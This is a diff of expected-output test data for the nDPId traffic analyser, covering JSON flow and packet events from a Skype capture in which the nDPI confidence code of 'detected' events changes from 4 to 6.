@@ -234,19 +234,19 @@ 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5i9YAAEARDTHAqAEinTeCqzLdnEwAJdiNeuEC3c6rdtKsOez6ZXpeJVa7dJ779QK3\/h1JCUU="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4dm4AAEARIgTAqAEiQTffQTLdgQkAJKmFeuMCyKqN77xeuXZwH4mCRZ2EnuTirQv1Yiuj0A=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.65","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4qTUAAEARhmHAqAEi1cezjDLdnEMAJE+IeuUC57gN1FWjl+cH4OXx7LBzSKM5WN7Ui1CRpw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAx6cAAEARH9zAqAEinTg0JzLdnF8ALF\/teucC9OsZNQfegPGKe6bjID0chTfhFg98J57+zrR\/SJSxjuh7"} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431970649778,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970649778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+a34AAEARfBXAqAEinTg0GTLdnEoAKvPOeukCU4Ora98LBiEx3upKt3C\/idNCTbgKHnJdEXlx5pIWdA=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="} 
@@ -257,19 +257,19 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ax0AAEARLXbAqAEiQTffHDLdnE4AKA\/ueusCO4\/2IMsd1vZVtYtrG4KJHI0MKaf\/zYcpuYfyCTg="} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA02DgAAEARwOTAqAEinTeCmjLdnE0AIDT4eu0C9+f6EdNHv7hYXHZqXAueiqwkwiBF"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+20MAAEARvT3AqAEiQTffLDLdnFQAKsWAeu8CRodfDjWwQgXB9ThlvK8WB1Z6kJ0K1lKVKQH1\/lgrJA=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA++5AAAEARZaPAqAEiQAQXrTLdnFEAKkiDevECuUkWpyPJriCjpMdyVTxdl5EcBPkRY6\/lJZGF7hytnA=="} 
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/bcAAEARMcnAqAEi1cezmjLdnFEALEFuevMCLFThLGMqgdMtKoErvKHNoLTdO9PKUomxAAk6+9gobSzp"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 